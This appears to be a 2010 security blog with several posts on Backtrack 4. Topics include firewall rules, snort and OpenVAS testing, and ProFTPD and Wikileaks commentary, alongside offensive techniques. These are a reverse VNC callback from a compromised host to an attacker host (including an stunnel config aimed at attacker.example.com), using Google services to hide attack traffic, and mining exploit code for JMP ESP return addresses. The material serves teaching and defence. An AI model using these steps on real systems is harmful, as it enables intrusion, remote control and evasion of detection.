Monday, 20 December 2010

Example iptables firewall ruleset for Backtrack 4

When pen-testing, it is quite common to place your attack system in a hostile environment, on the internet side of a border router for example.

During your testing it is likely that you will be holding some confidential information on your system. You need to make sure that your system is secure, otherwise you may learn what it is like to get pwned, the hard way.

However, you do need to strike a balance: you must still be able to communicate with the target system, and open some ports, but only for services that will assist you in compromising that host or network.

Backtrack 4 (like many Linux platforms) has iptables, but some people forget to turn it on, assuming they are protected as long as they don't run any vulnerable services. Take great care.

To ensure some degree of safety, I would recommend:
  • Change your root password to something strong (don't forget your default MySQL password also)
  • Make sure you don't install any services that automatically start each time you boot.
    • If you install any new services (vsftpd for example) prevent them from starting on boot by editing the links in /etc/rc2.d/...
    • Only start services when you need them
    • Watch what you keep in your FTP share and www root etc.
  • Use a firewall, with a restrictive rule-set
    • Only open ports when you need them
    • (Which is what I am going to discuss here...)
Useful guide to iptables

Here is a good article to show you the basics of iptables configuration.

Saving and retrieving firewall rule-sets

iptables rule-sets can be saved and retrieved with the following commands:


iptables-save > /etc/iptables.rules


iptables-restore < /etc/iptables.rules

Using this technique means that you can pre-build several rule-sets and switch between them easily, or have a file that you edit and reload to add, remove or change rules.
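For example, the switching workflow can be wrapped in a small helper function. The /etc/iptables.rules.&lt;name&gt; naming convention and the function itself are my own sketch, not a Backtrack standard:

```shell
# fw_load: load a named, pre-built rule-set file.
# The /etc/iptables.rules.<name> convention is my own, not a standard.
fw_load() {
    ruleset="/etc/iptables.rules.$1"
    if [ ! -f "$ruleset" ]; then
        echo "no such rule-set: $ruleset" >&2
        return 1
    fi
    iptables-restore < "$ruleset"
}

# Example (needs root): fw_load shieldsup
```

Running fw_load shieldsup would then restore /etc/iptables.rules.shieldsup, and you can keep as many named rule-set files as you like.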

Here is an example which provides a reasonable level of protection. It also contains some useful rules, commented out, which could be quickly added.

# Example iptables firewall rule-set for Backtrack 4
# To use, uncomment or add any relevant ports you need and run:
# iptables-restore < /etc/iptables.rules.shieldsup
*filter
:INPUT ACCEPT [0:0]
:FORWARD DROP [0:0]
:OUTPUT ACCEPT [0:0]

# Established connections are allowed
-A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT

# Connections from your local machine are allowed
-A INPUT -i lo -j ACCEPT

# Uncomment inbound connections to your own services, or create new ones here:
#-A INPUT -i eth0 -p tcp -m tcp --dport 80 -j ACCEPT # HTTP port 80
#-A INPUT -i eth0 -p tcp -m tcp --dport 443 -j ACCEPT # HTTPS port 443
#-A INPUT -i eth0 -p tcp -m tcp --dport 4444 -j ACCEPT # Standard reverse shell port
#-A INPUT -i eth0 -p tcp -m tcp --dport 21 -j ACCEPT # FTP port 21
#-A INPUT -i eth0 -p udp -m udp --dport 69 -j ACCEPT # TFTP port 69

# Drop everything else inbound
-A INPUT -j DROP

# Your own client-side-initiated connections are allowed outbound
-A OUTPUT -o lo -j ACCEPT
-A OUTPUT -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT

# Drop everything else outbound
-A OUTPUT -j DROP
COMMIT

# For more info visit

More targeted bypass rules for the basic rule-set

In addition you may want to add more targeted rules, for example so that only a single host can access a payload that you have hosted on your web-server.

In that case you may want to add a more specific rule in the following way: 

iptables -I INPUT -p tcp -m tcp -s a.b.c.d/32 --dport 80 -j ACCEPT

So, for example, to add inbound rules so that a target at a.b.c.d can access your HTTP server, and a handler you have listening on port 443, type in the following rules:

iptables -I INPUT -p tcp -m tcp -s a.b.c.d/32 --dport 80 -j ACCEPT
iptables -I INPUT -p tcp -m tcp -s a.b.c.d/32 --dport 443 -j ACCEPT


Don't forget to test your rule-sets are working from an external host before you rely on them in a live situation!

Look after yourself ;o)

Thursday, 16 December 2010

Setting up a reverse VNC connection (linux version)

If you are reading this, you have probably heard of a reverse shell, where an attacker uses a buffer overflow (or some other exploit) to connect from the victim back to an attacking system which has a public IP address (perhaps bypassing a NAT device or firewall rule-set).

A lot of control is possible with a command line shell, but for some operations a graphical interface, such as VNC, can be useful.

If a target system is behind a NAT, it is still possible to connect out with a VNC connection, giving graphical control of the target system to an external attacking system. This is possible, even without using SSH port tunnelling.

This article is only intended for educational purposes. Please do not use this to try to bypass security controls.

How to set this up

In this example I have two Linux systems, and the attacker system has used an exploit to gain an initial command line shell to the victim.

On the attacking system (which has a public IP address) start vncviewer as follows:

vncviewer -listen

You should get a response something like:

vncviewer -listen: Listening on port 5500

On the target system, you can start the VNC server and enter a password as follows:

vncserver :1

It is then possible to use vncconnect to connect the local vncserver on the target system back to the attacker system:

vncconnect -display :1 <attacker-host>:5500

This forwards the VNC connection from the target system back to the attacker, and a nice graphical interface of the target pops up on the attacker's desktop.

Of course, these connections could be run on different ports (dependent on firewall rules), redirected with port-redirectors, or tunneled over other protocols, perhaps SSL using stunnel for example.
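To sketch the stunnel idea: a client-mode stunnel on the target could wrap the outbound VNC connection in SSL. Everything below (hostnames, ports, section name) is a placeholder, not a tested configuration:

```
; stunnel.conf sketch for the target system (all values are placeholders)
client = yes

[vnc-out]
accept =
connect = attacker.example.com:443
```

vncconnect would then be pointed at rather than at the attacker directly, with a matching server-mode stunnel on the attacker forwarding the decrypted traffic to the listening vncviewer on port 5500.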

Similar solutions are just as easy with Windows systems, so definitely something to be aware of.

  • When defining firewall rules, it is very important to focus on outbound rules (in addition to inbound rules)
  • Outbound connections should be logged and monitored to help identify hackers, virus infections, and technical employees trying to bypass security restrictions.

Sunday, 12 December 2010

Can Google really be used as a proxy server - to avoid detection?

I've seen it mentioned in various places, that Google (and other search engines) could be used as a pseudo proxy-server, to avoid content security solutions, or to avoid direct contact with a target website.

Why might someone want to do this?
  1. To bypass filtering controls such as URL-based web filters, which are deployed internally by many companies to enforce acceptable usage policies.
  2. To footprint a site or organization before an attack, without contacting the site directly or leaving any traces of the attacker's IP address in the site's HTTP or firewall logs.
  3. As a way to obfuscate direct URL attacks such as RFI and LFI, directory traversal, SQL injection etc, again without leaving any traces of your IP address in logs.
In short: for privacy, or to hide malicious intent.

Do not use these techniques for malicious purposes, this article is for education only.

There are three methods that I have explored which we will look at here.
  • Google cache
  • Google translation service
  • Google wireless transcoder
I will briefly discuss the limitations of each of these techniques. The target site used in the examples in this article is purely illustrative.

Google's cache

So, when you search for a site in Google, you can either go to the site, or view the content that Google cached from the site the last time Googlebot was there.

All very well and good, and certainly lots of the content does come from the Google cache, rather than the original server.

Cached content can also be accessed more directly, via a Google cache URL.

However, depending on how much Google has cached (which is variable and site-dependent), not everything comes from the cache. For example, images often come from the original site itself.

So this would likely trigger logging and content security solutions. (Not exactly "low profile".)

One way to avoid direct contact with the site would be to add a dummy host entry to the hosts file on your system, mapping the target's hostname to a harmless address such as, so that your browser can never go to the site directly.

The cached content is static, so it is not possible to use it for URL attacks, as far as I can see.

Google's translation service

The Google translation service is pretty handy if you want to view a foreign language site in your own language.

This feature could also be misused as a proxy. In this example we translate an already English site from Korean to English.

We would choose a language such as Korean, Japanese etc, so that there are no substitutions for our English content. (The English text is left as is.)

i.e. (source language) sl=ko, (translated language) tl=en, and (URL) u= set to the target page.

Obviously, as with the caching example above, this method can remove some content, such as video, from the pages.

Unfortunately, images will often still be referenced from, and hosted on, the original site, which could trigger logging and content security, so adding a hosts entry (as above) would prevent direct contact.

Google's wireless transcoder

Google has a wireless transcoder, to reduce web content size in preparation for delivery to small wireless devices such as phones, iPhones and Blackberries.

This application is accessible here

This is a good one if you are just after some text from a site, but the service can also shrink images for some sites (so these shrunken images will come from Google rather than the original site).

The content is very cut-down (and the structure significantly changed as a result) but it all comes from Google rather than the target site, which could be an advantage.

Is it possible to pass parameters?

So, is it possible to pass parameters in a URL using these methods?

Google cache - no.

Google translation service - parameters were passed successfully in an example search on eBay.

Google wireless transcoder - likewise, parameters survived in an example search on eBay.

This suggests that URL attacks may be possible using the latter two methods.


These are interesting techniques but not particularly effective in my opinion. If you are looking for privacy it would be far more effective to use an anonymous web proxy, or use TOR networking (or both).

It may be possible to use these techniques to bypass some content security solutions, but there are mitigations.


It may be possible to block Google translation, cache, and wireless transcoder on a company content security solution. This may go some way to limiting this type of obfuscation, but would cause some functionality limitations.

How to get information from Google to pursue and track criminals

Of course, if you are thinking of using these techniques to aid illegal activities such as URL-based attacks, then don't.

Remember that law enforcement frequently request and obtain log information from companies like Google (though it is unclear how much of this information is actively logged).

If you have additional questions about obtaining legal information from Google, then you can contact them at
legal-support <-at-> google <-dot-> com

Subpoena and legal requests could be sent to:

Attention: Custodian of Records
Google, Inc.
1600 Amphitheatre Parkway
Mountain View
CA 94043

Tuesday, 7 December 2010

How to use snort on Backtrack 4: Basic examples with a test attack

Snort is a very well known intrusion detection system (IDS) which can be very powerful in detecting malicious attacks against a system or network.

One of the big advantages of using it is that it is free and open-source.

Snort can be a little tricky to understand and use for the beginner, so here I discuss some basic usage, as well as showing some "practice" attacks (running snort on one system, and attacking it from a second system, to see what an attack looks like).

Please remember to use these techniques for legitimate defensive and testing purposes, and not maliciously. Every action you take has consequences, and you will be heir to the results of your actions.

I am using snort on Backtrack 4 R2, as it is pre-installed and configured for convenience.

Snort: packet filter and rule-set

Essentially snort is just a packet filter, like tcpdump or tshark (wireshark). The power of snort is within its rule-based engine, which is able to filter packets, look for attack-signatures, and alert on them.

First I will run snort and tcpdump side by side in their most basic format, and we will see what we can capture.

Packet filter: tcpdump and snort comparison

Look at this quick comparison of tcpdump and snort, where I started both applications on the target system and sent a single ping from the attacking system.

tcpdump -i eth0 host <attacker-ip>

tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes
14:32:16.272777 IP > bt.lan: ICMP echo request, id 10525, seq 1, length 64
14:32:16.272804 IP bt.lan > ICMP echo reply, id 10525, seq 1, length 64

snort -q -v -i eth0

12/07-14:35:30.674241 ->
ICMP TTL:64 TOS:0x0 ID:0 IpLen:20 DgmLen:84 DF
Type:8  Code:0  ID:12829   Seq:1  ECHO

12/07-14:35:30.674269 ->
ICMP TTL:64 TOS:0x0 ID:16338 IpLen:20 DgmLen:84
Type:0  Code:0  ID:12829  Seq:1  ECHO REPLY

If you look closely you will see that, with the preceding options, you get more or less the same output from both tcpdump and snort. We can see an ICMP echo request arriving from the attacking system, and our reply going back.

Detecting signatures with snort

Now we will edit the snort configuration to enable some rules (it is probably best to make a backup copy of "/etc/snort/snort.conf" before you try this).

I am going to configure snort on my target system. I edit /etc/snort/snort.conf and comment out the following line by adding a "#" in front:

var HOME_NET any

...and add the following lines

var HOME_NET <target-ip>/32 # Test target system
var EXTERNAL_NET <attacker-ip>/32 # Test attacker system

These lines effectively tell snort what is inside (and outside) your protected zone.

Detecting port-scans

Now I will enable a rule to detect port-scans. Port-scans are usually the first active component of an attack, so it is a good idea to monitor for them.

Near the end of the "snort.conf" file in the rules section, uncomment the following line:

include /etc/snort/rules/scan.rules

Now we will start snort on the target, and then run a standard nmap scan from the attacking system:

snort -q -A console -i eth0 -c /etc/snort/snort.conf


This produces a huge amount of alerts to the screen. Each alert in this example is saying something along the lines of:

12/07-15:05:34.012119  [**] [1:2000537:6] ET SCAN NMAP -sS [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} ->

However, if you were to simply scan a single port with the following nmap command, this would not trigger an alert.

nmap -sV -sT -p T:80 <target-ip>

This is because thresholds are used in the scan signature, in order to separate legitimate connections from port-scans. The real skill in using snort is in configuring the rule-set to trigger only for real issues, and ignore legitimate traffic.
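To illustrate, a threshold can be written directly into a rule. This is a hypothetical sketch (the sid, message and counts are made up, using the snort 2.8-era threshold keyword); it would alert only once a single source had sent 20 bare SYNs within 10 seconds:

```
alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"Possible SYN sweep"; \
    flags:S; threshold: type threshold, track by_src, count 20, seconds 10; \
    sid:1000001; rev:1;)
```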

Malicious payloads

OK, so I will disable the scan rules, and try something a little more aggressive.

I will uncomment the following rule to enable it, and see if we can trigger it:

include /etc/snort/rules/ftp.rules

On the target system I will start an FTP server (I am using vsftpd, a version with no known exploits, purely for testing this attack). I then attack the FTP server using the Metasploit db_autopwn method.

This is a very noisy attack, because using db_autopwn will basically scan for any open ports, and then launch all exploits which happen to match the port information found (more detail on how to run this attack here).

So, what did we see on the target system? Certainly many exploit attempts triggered alerts.

12/07-15:48:06.820726  [**] [125:7:1] (ftp_telnet) FTP traffic encrypted [**] [Priority: 3] {TCP} ->
12/07-15:48:21.217972  [**] [1:2417:4] FTP format string attempt [**] [Classification: A suspicious string was detected] [Priority: 3] {TCP} ->
12/07-15:48:21.217972  [**] [1:1377:17] FTP wu-ftp bad file completion attempt [**] [Classification: Misc Attack] [Priority: 2] {TCP} ->
12/07-15:48:21.217972  [**] [125:2:1] (ftp_telnet) Invalid FTP Command [**] [Priority: 3] {TCP} ->
12/07-15:48:35.448702  [**] [1:8415:2] FTP SIZE overflow attempt [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} ->


It is definitely picking up some nasties, and alerting us to tell us which IP address is the source.

False positives

Interestingly, whilst I was running this test, and writing this blog, I also got some false positives:

12/07-15:53:53.638563  [**] [119:15:1] (http_inspect) OVERSIZE REQUEST-URI DIRECTORY [**] [Priority: 3] {TCP} ->
12/07-16:01:59.533010  [**] [119:15:1] (http_inspect) OVERSIZE REQUEST-URI DIRECTORY [**] [Priority: 3] {TCP} ->
12/07-16:02:57.275727  [**] [119:15:1] (http_inspect) OVERSIZE REQUEST-URI DIRECTORY [**] [Priority: 3] {TCP} ->


This false-positive situation is quite common, as I have not done any optimization at this stage. The flagged traffic is not a threat; it is part of me writing this blog, which has somehow triggered a rule in my configuration.

Deploying snort in a network

Running snort in this way (IDS) does not stop exploits, but it would alert you to potential attacks that you may otherwise be unaware of.

To block attacks you would need to run snort in IPS mode (Intrusion Prevention) which involves running snort inline, and dropping malicious packets. Maybe a blog for another time.

This test is with snort in a single host scenario. Typically in a network deployment you would use a span-port on a switch, and connect a system running snort to the span port, so that it could "see" all the traffic on that subnet.

Additional configurations would include deploying logging and alerting in a more resilient and manageable way, such as via syslog or MySQL.
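For example, snort.conf takes output plug-in directives; the two lines below (with illustrative credentials) would send alerts to syslog and log to a MySQL database respectively:

```
output alert_syslog: LOG_AUTH LOG_ALERT
output database: log, mysql, user=snort password=changeme dbname=snort host=localhost
```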


In summary, Intrusion Detection/Prevention (IDS/IPS) is an important part of a defense-in-depth strategy for secure environments.

Snort is essentially free, though it needs a considerable amount of configuration and monitoring to ensure that it is properly optimized: detecting threats, but not wasting time and resources by generating false positives.

(Please leave a comment if you found this exercise helpful)

Friday, 3 December 2010

Data mining Backtrack 4 for buffer overflow return addresses

So, if you are reading this blog you are probably aware of the online exploit database sponsored by Offensive Security, which currently holds over 15,000 exploits, from the present back to the mid-1990s.

There are some advantages to using this database online, such as the ability to download some of the vulnerable applications for testing purposes.

However, there is already a local copy of all of these exploits on Backtrack 4, held in /pentest/exploits/exploitdb and its subdirectories, which has some other advantages that we explore here, i.e. mining it for useful information.

The advantages of a local copy of the database

In addition to the convenience of having the exploits already downloaded, there are other things that you can do by having a local copy. (A few weeks back, I used this local copy to do some analysis of language trends in exploit development.)

Here I am going to explore a couple of ways we could retrieve previously found return addresses, using the knowledge stored in files on backtrack.

Updating the exploit database

First get your copy of the exploit database up-to-date.

cd /pentest/exploits/
svn co svn://

You should see the new files and changes whiz past as you get your copy of Backtrack up to the latest revision of the exploit database.

Basic exploit searches

Cool, so we will test the update by looking for something recent in the index file. I will do a quick search for an exploit from this week, the ProFTPD remote root exploit.

cd exploitdb
grep -i "ProFTPD" files.csv | grep -i "remote root"
107,platforms/linux/remote/107.c,"ProFTPD 1.2.9rc2 ASCII File Remote Root Exploit",2003-10-04,bkbll,linux,remote,21
110,platforms/linux/remote/110.c,"ProFTPD 1.2.7 - 1.2.9rc2 Remote Root & brute-force Exploit",2003-10-13,Haggis,linux,remote,21
3021,platforms/linux/remote/3021.txt,"ProFTPD <= 1.2.9 rc2 (ASCII File) Remote Root Exploit",2003-10-15,"Solar Eclipse",linux,remote,21
15449,platforms/linux/remote/,"ProFTPD IAC Remote Root Exploit",2010-11-07,Kingcope,linux,remote,0

There are a few in there; the one from this week is 15449 (the last line).
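The search above is easy to wrap in a tiny helper; the function name and the optional second argument are my own additions, not a Backtrack tool:

```shell
# sploitsearch: case-insensitive search of the exploitdb index file.
# Helper name is my own; pass a second argument to point it at a
# different copy of files.csv (useful for testing).
sploitsearch() {
    pattern="$1"
    csv="${2:-/pentest/exploits/exploitdb/files.csv}"
    grep -i "$pattern" "$csv"
}
```

Running sploitsearch "proftpd" | grep -i "remote root" then reproduces the search above.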

Searching for specific code within the database

We are up-to-date, so what interesting things can we do with all this exploit data?

How about we search all the files for some piece of information we might want to know?

Let's take the example of looking for "JMP ESP" addresses (used in buffer-overflows to control code execution). Quite often, good information on this is available in the comment sections of the exploits.

First we will search for all the files that might contain offset addresses, using fgrep to recursively search and list any files containing the phrase "jmp esp":

fgrep -r -l -i "jmp esp" *

This produces a long list of files (including some I don't want)

...truncated for brevity...

We will filter out anything with "svn-base" and count what we have left:

fgrep -r -l -i "jmp esp" * | grep -v "svn-base" | wc -l

232

Extracting and filtering the data

We have 232 files potentially containing "jmp esp" addresses, let's grab those suckers.

We'll wrap our filenames in a "for" loop, to pull just the lines we want, out of the files we are interested in.

for file in $(fgrep -r -l -i "jmp esp" * | grep -v "svn-base"); do grep -i "jmp esp" $file; done

This produces a big blob of data, but, say we are interested to find addresses for Windows XP SP 2:

for file in $(fgrep -r -l -i "jmp esp" * | grep -v "svn-base"); do grep -i "jmp esp" $file; done | grep -i "Win XP SP2"

[ 'Win XP SP2 English', { 'Ret' => 0x77D8AF0A } ], # jmp esp user32.dll 

$ret = "\xED\x1E\x95\x7C"; #jmp esp en ntdll.dll,win xp sp2(spanish) 
"\xb3\x57\x04\x7d"  # jmp esp @ shell32.dll - Win XP SP2

Well, that gives 3 options, one for Spanish, two for English. Pretty handy if you don't happen to have a Windows XP SP2 system lying around waiting to help you develop your exploit for that version - all thanks to exploit developers who comment their code nicely.

(there are several more if you mess with the final grep expression to try different ways of writing "WinXP sp2").
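The whole pipeline can be captured in a reusable function; the name and argument layout here are my own sketch:

```shell
# retfind: print every line matching a pattern from files under a
# directory, skipping Subversion base copies. Name and layout are my own.
retfind() {
    pattern="$1"
    dir="$2"
    grep -r -l -i "$pattern" "$dir" 2>/dev/null | grep -v "svn-base" |
    while read -r f; do
        grep -i "$pattern" "$f"
    done
}

# e.g. retfind "jmp esp" /pentest/exploits/exploitdb | grep -i "win xp sp2"
```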

Mining Metasploit

Of course, you could run similar operations on the Metasploit modules. First update Metasploit:

msfupdate
Then we can run the following command (which gives another handy set of return addresses):

for file in $(fgrep -r -l -i "jmp esp" /pentest/exploits/framework3/modules/*); do grep -i "jmp esp" $file; done | sort -u | grep -i "xp sp2"

  #0x773f346a # XP SP2 comctl32.dll: jmp esp
 #[ 'Windows XP SP2 English', { 'Ret' => 0x76b43ae0 } ], # jmp esp, winmm.dll
 'Ret1' => 0x00420B45, # jmp esp on XP SP2 (iexplore.exe)
 'jmp esp' => 0x774699bf, # user32.dll (xp sp2 and sp3)
 [ 'Win XP SP2 English', { 'Ret' => 0x77D8AF0A } ], # jmp esp / user32.dll
 [ 'Windows XP SP2 - EN', { 'Ret' => 0x0fa14ccf } ], # jmp esp expsrv.dll xpsp2 en
 [ 'Windows XP SP2 - English', { 'Ret' => 0x7c941eed} ], # 0x7c941eed JMP ESP - SHELL32.dll
 [ 'Windows XP SP2 Pro German', { 'Ret' => 0x77D5AF0A } ], # SHELL32.dll JMP ESP
 [ 'Windows XP SP2 Spanish', { 'Ret' => 0x7c951eed } ], #jmp esp
 [ 'Windows XP SP2 Universal', { 'Ret' => 0x77d92acc } ], # USER32.dll JMP ESP
 [ 'Windows XP SP2/SP3 English', { 'Ret' => 0x774699bf } ], # jmp esp, user32.dll
 ['Windows XP SP2 French', { 'Rets' => [ 1787, 0x77d5af0a ]}], # jmp esp
 ['Windows XP SP2 German', { 'Rets' => [ 1787, 0x77d5af0a ]}], # jmp esp
 ['Windows XP SP2 Polish', { 'Rets' => [ 1787, 0x77d4e26e ]}], # jmp esp

Of course you can add the grep -B or -A options, to get lines before and after the line containing what you searched for.

There are probably many other uses for this type of searching. Looking for strings like "jmp esp" is just one example.

Please leave a comment if you find this helpful, or if you can think of any other applications for these techniques.

Thursday, 2 December 2010

ProFTPD: site compromised, and code backdoored

Rather interesting news from the ProFTPD project this morning. It sounds like a 0-day vulnerability was found in their software recently.

Attackers then proceeded to attack ProFTPD's own FTP servers using the 0-day exploit, and altered ProFTPD's source code to insert a backdoor.

More detail here.

Some users have downloaded the compromised software from ProFTPD's site. Very nasty.

I always use vsftpd, and I would highly recommend it, as it has been designed specifically with security in mind. If you are hosting important files on an FTP site, you need to make sure it is secure, and that nobody can compromise the server or tamper with the files on it.

Maybe the ProFTPD project should use vsftpd for their FTP servers ;o)

It's no joke; I would say that there is certainly some benefit to using another product (other than the one you produce), especially if you are hosting your product "on your product", so to speak.

This is not the first time vulnerabilities have been found in ProFTPD; there have been several over the years. If you use ProFTPD, my advice is to switch to vsftpd.

Wednesday, 1 December 2010

Vulnerability scanning with OpenVAS

If you are a Sysadmin, IT Manager or Security Manager, you need to protect your network. You need to know where your weaknesses are, so that you can put together a plan to fix them.

You are a busy guy, and the business where you work doesn't really want to spend all its hard-earned cash on vulnerability scanning software (without good justification). If you can't justify a full external pentest (EPT) or internal vulnerability assessment (IVA), you are the guy on the ground, and your company's security is your problem.

Increasing costs

Vulnerability scanners can be expensive. Nessus (which used to be free) is now a pay-for, subscription-based service, and other scanners such as SAINT are not cheap either.

Core Impact, for example, is an awesome piece of software, well worth purchasing if you are a professional pentesting company with lots of clients, but way outside the IT security budget of most companies.

Free solution

So, thank goodness for open-source software; OpenVAS to the rescue.

Here we take a look at the basic setup process, using OpenVAS on Backtrack 4, and do some scans to see what results we get, and how useful they are.

Setting up and updating OpenVAS

Before we start, it is very important that access to your vulnerability scanner is secure. This system is going to hold all the data from your scans. It will hold information detailing vulnerable systems, systems with configuration errors, weak passwords, missing patches etc. You definitely don't want this information to fall into the hands of an attacker.

Using OpenVAS

I will cover setting up OpenVAS on Backtrack from the command line, because in my experience this is the easier way to use it in the long run.

Setting up the credentials

First create a certificate for your server (so that communications with the scanner are secured):

openvas-mkcert
(Accept the defaults for testing purposes, or fill in the details correctly, the choice is yours)

Now we will create a user for administration:

openvas-adduser
Enter a user, select password as the authentication method, set a password, and skip the rule creation with Ctrl-D. Don't forget this username and password; we will need them below, and in the future for running further scans and accessing scan reports.

Updating the OpenVAS signatures

Next we need to update our scan signatures, which can be done as follows:

openvas-nvt-sync
You will see lots of information whiz past as the updates are performed. This may take a few minutes to run, so be patient.

Starting the scanner and performing a scan

Once you have downloaded the latest updates, you can start the scanner and client, and do a basic scan.

First we need to start the scanner:

openvassd
You will see the plug-ins being loaded, which should take a minute or so on a fast system. (If this takes a long time, you should consider the hardware you are running this system on; it needs some power.)

To open the client interface, type:

OpenVAS-Client
To run our first scan, click on the "Scan Assistant" top left. Give the task a scope and name, add the subnets or hosts you want to scan, and then click "execute". (I suggest starting with a single host)

Authenticating to the scanner to start the scan

The dialog will ask you to authenticate to the scanner with the credentials you supplied above.

If you get an authentication failure (I have had a few issues with this dialog at times) check that your scanner is running on port 9390 by running the command:

netstat -antp | grep 9390

If not, stop and start it again with the following commands:

pkill openvassd
openvassd

Scanning progress

You will see a blue progress bar (the UI may then hang for a bit, but it will clear). Confirm with OK, and your scan should start shortly.

You should then see the scan dialog below. Depending on the number of hosts you are scanning, this may take a long time to complete. Be patient.

I advise starting by scanning a small number of machines, and working up to larger groups as you gain familiarity and experience.

The report

When the scan completes, you will get a report. The items that need urgent attention will be detailed with a "no entry" sign. There will likely also be warnings and other informational messages.

Bear in mind, that whether vulnerabilities pose a real threat is very much dependent on the location and purpose of the systems in question.

Are the threats real?

I have often seen false positives in vulnerability scans where, after further investigation, the highlighted threats simply do not exist, so take care to examine the reports with a questioning mind. Often there are non-issues flagged. This is where analysis, experience, knowledge and evaluation come into play.

Additionally, many companies will have lots of internal systems that have numerous services running on them. These may be flagged as having potential vulnerabilities, though this may not be a relevant issue if the systems are running purely in an internal LAN environment (As long as there are no attackers on the internal LAN).

However, if public facing systems, that have firewall ports open to the internet, have similar vulnerabilities, then this is much more of a problem, and would likely need to be addressed as soon as practical.

In short, all these vulnerabilities need to be put into context and prioritized: you don't want to spend all of your time fixing non-problems; you need to focus on the most pressing issues.

Planning remediation

Now you have found all these problems, and prioritized the most urgent issues, it is time to have a chat with your management team, and get some focus and agree timescales/resources to fix them.

OpenVAS is not a "magic" solution

Take all this with a pinch of salt though; vulnerability scanners are automated systems, and are limited in their scope and flexibility.

Vulnerability scanning is not the same as penetration testing, and a skilled pentester or ethical hacker will likely find many issues that an automated vulnerability scan would miss (I certainly have).


The issues found are usually remedied by the normal cornerstones of IT Security best practice:
  • Patch management
  • Configuration management
  • Replacement of legacy/unsupported software
  • Choosing secure software
  • Strong passwords
  • Clear policies and procedures
  • User education

Tuesday, 30 November 2010

Some thoughts and analysis of the Wikileaks "Cablegate" situation

The current Wikileaks "Cablegate" case is interesting on a variety of IT Security topics, especially around access control, and the effect that Web 2.0 can have on confidential and secret information.

From a data security perspective, I feel that this is a relatively new situation that is catching the US government off-guard. Certainly it is a situation brought to a new level by the internet (and the public's desire to read about political gossip).

I will stay away from the politics, but here are some of my thoughts about the data, and the data security, in brief.

Very worrying for the US Government

This is a very worrying situation for the US Government. Data loss of this magnitude and media interest is unprecedented. I feel that this situation is likely to cause political diplomacy issues for some time to come.

I am sure that US data security will be tightened as a result (so some good will come of it), perhaps with new legislation. Meanwhile the information contained in the cables is getting front-page coverage in national newspapers worldwide.

The Wikileaks Cablegate data online

Wikileaks have certainly spent a lot of effort making the data available, with multiple mirrored websites.

The data is getting indexed (and cached) by Google, making searching very powerful if you know how to use Google operators.

For Google searching, it would be possible to use expressions built from operators such as site: and cache:, for example - and if you know your Google operators, you could combine these with something more focused.

As I said, the data is also being cached by Google (and other search engines) so if the sites were to be taken down, then it may still be possible to access the information by clicking on the "cache" links provided by Google.

It is interesting that data never really goes away on the internet; once it is out there, it is out there, and there would be no way of removing all instances of the data, no matter how hard someone tries.

Release of information rate, and data-cleansing

The release of new information is rather slow. I suspect this is due to the data-cleansing that Wikileaks are currently doing (they seem to be removing names of individuals from the data before publication, except for names of senior politicians and leaders, though I am not sure what the logic behind that is).

With just over 0.1% of the data currently hosted, and a small dribble of new data each day, I feel that it is going to take a massive amount of effort for Wikileaks to publish the data. They are talking about sanitizing a quarter of a million documents, an enormous task!

I would estimate it will take several years to release all the data at this rate. It's a huge project, and will take considerable time and resources to complete. Meanwhile, news keeps coming with each release, and some of the press have their own copy of the data (Though I think people will get bored of it within 6 months, if Wikileaks lasts that long...)

Denial of service

I saw a tweet earlier in the week (right after the launch of the Cablegate data) in which Wikileaks described that their systems were under a distributed denial-of-service (DDoS) attack.

This may be the US Government, or third parties acting on behalf of, or completely independently of them. I am sure this situation will change rapidly over time, such is the nature of DDoS and defenses against it.

The platform

Interestingly, looking at the DNS records, I can see that Wikileaks are currently hosting part of the Cablegate site on Amazon EC2 (certainly one of the mirrors I checked resolves to the Seattle Amazon EC2 location). Other servers are currently located in France.

If the US do decide to pull the plug on Wikileaks, then I would think it would be relatively straightforward to do for the current platform. Whether this could be classed as "political censorship of the web" is open for debate - but as I said, I will stay away from the politics.

Anyway, I feel it would be easier to take the current platform off-line by political pressure, negotiations with vendors, and legal means rather than DDoS.

However, it would likely just pop up somewhere else - such is the nature of the internet. Once the data is out there it will not be deletable.

Also, the small amount of data released so far is easily available via bit-torrent among other file-sharing methods.

Cable data

It seems that the cables are each quite small pieces of data, like telegrams. The cables are very compact and concise, apparently typically around 1,000 words (around 6K each).

If this is representative of the rest of the data, then this would put 250,000 documents at a size of around 1.5GB. However, due to the nature of the data, I would say that it would compress at a good ratio (with Winzip for example), perhaps down to 500MB, so it would easily have fit onto a memory stick, SD card, recordable CD or DVD.
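As a quick sanity check on the arithmetic (taking the ~6K-per-cable figure above, which is itself an estimate):

```shell
# back-of-envelope: 250,000 cables at ~6 KB each, in whole megabytes
echo "$((250000 * 6 / 1024)) MB"   # prints "1464 MB", i.e. roughly 1.5 GB
```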

In other words, with today's technology a quarter of a million cables are surprisingly portable. Perhaps this is how it was stolen (it has been suggested in the past that a CD-R format was used by Bradley Manning, and that this is where the data came from).

Need to know

Mitigations for this leak should have been better (in my opinion). From a data governance perspective, it looks like there has been a huge failing in the application of "least privilege", i.e. the "need to know".

I have seen reports that suggest that up to 1 million US military, and law enforcement personnel may potentially have had the level of access required to view some of this data. If true, that is an incredible situation and no surprise that something this damaging has happened.

I doubt this is true, but in any case, access control and data loss prevention seem to have been lacking - I am sure this is currently in urgent review!

Sunday, 28 November 2010

FTP transfers from within a non-interactive shell (Windows and Linux)

This post covers how an attacker can perform FTP file transfers from within a non-interactive shell (for both Windows and Linux target systems).

Please use this information for legitimate penetration testing purposes only.

When a system is compromised by an attacker, it is common to try to initiate a command shell so that the system can be remotely controlled; commands issued, and files uploaded/downloaded.

However, basic non-interactive shells to compromised systems can be rather tricky to use, because it is so easy to make a mistake, run an interactive program, and then lose control of your shell (and connectivity to the compromised host).

This is why I generally prefer to get an SSH or Metasploit Meterpreter session going once I have initially compromised a system. Before an attacker could do this however, they would need to upload or download files from the system, perhaps using FTP, TFTP, SSH or HTTP. Here we look specifically at FTP.

The interactive nature of the FTP console

As the FTP program provides an interactive prompt, it is not straightforward to use it in a non-interactive shell. Once you start the FTP command, the FTP console will be stuck waiting for input it can never get.

So how can you use FTP in a non-interactive shell?

